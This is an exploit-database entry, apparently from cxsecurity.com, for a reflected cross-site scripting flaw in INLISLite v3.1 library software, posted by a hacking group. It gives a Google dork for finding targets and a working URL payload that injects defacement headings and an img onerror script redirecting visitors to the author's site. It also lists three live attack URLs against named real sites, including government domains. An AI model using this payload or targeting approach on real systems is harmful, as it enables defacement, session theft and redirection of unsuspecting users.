INLISLite v3.1 - Cross Site Scripting

2020.10.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################# # Exploit Title: INLISLite v3.1 - Cross Site Scripting # Google Dork: intext:"INLISLite v3.1" "/browse" # Date: 2020-10-24 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: perpusnas.go.id # Software Version: 3.1- # Software Link: N/A # Tested on: Linux gh05t666nero 5.8.0-kali2-686-pae #1 SMP Debian 5.8.10-1kali1 (2020-09-22) i686 GNU/Linux ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Exploit: ============ ?action=browse&tag=%3Ch2%3EXploited%20by%20IndoGhostSec%3C/h2%3E%3Cbr%3E%3Cbr%3E&findBy=%3Ch4%3EFeat%3C/h4%3E%3Cbr%3E&query=%3Ch2%3EGh05t666nero%3C/h2%3E&query2=%3Cimg%20src=x%20onerror=alert(%27Gh05t666nero%27,location=%22https://anonsec.my.id%22);%3E ############################################################# [*] Demo: ========= https://inlis.atrbpn.go.id/inlislite3/digitalcollection/browse?action=browse&tag=%3Ch2%3EXploited%20by%20IndoGhostSec%3C/h2%3E%3Cbr%3E%3Cbr%3E&findBy=%3Ch4%3EFeat%3C/h4%3E%3Cbr%3E&query=%3Ch2%3EGh05t666nero%3C/h2%3E&query2=%3Cimg%20src=x%20onerror=alert(%27Gh05t666nero%27,location=%22https://anonsec.my.id%22);%3E http://digilibfeb.ub.ac.id/article/browse?action=browse&tag=<h2>Xploited by IndoGhostSec</h2><br><br>&findBy=<h4>Feat</h4><br>&query=<h2>Gh05t666nero</h2>&query2=<img src=x onerror=alert('Gh05t666nero',location="https://anonsec.my.id");> https://perpustakaan.pemkomedan.go.id:8123/inlislite3/opac/browse?action=browse&tag=<h2>Xploited by IndoGhostSec</h2><br><br>&findBy=<h4>Feat</h4><br>&query=<h2>Gh05t666nero</h2>&query2=<img src=x onerror=alert('Gh05t666nero',location="https://anonsec.my.id");> ############################################################# [*] About Me: ============= # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top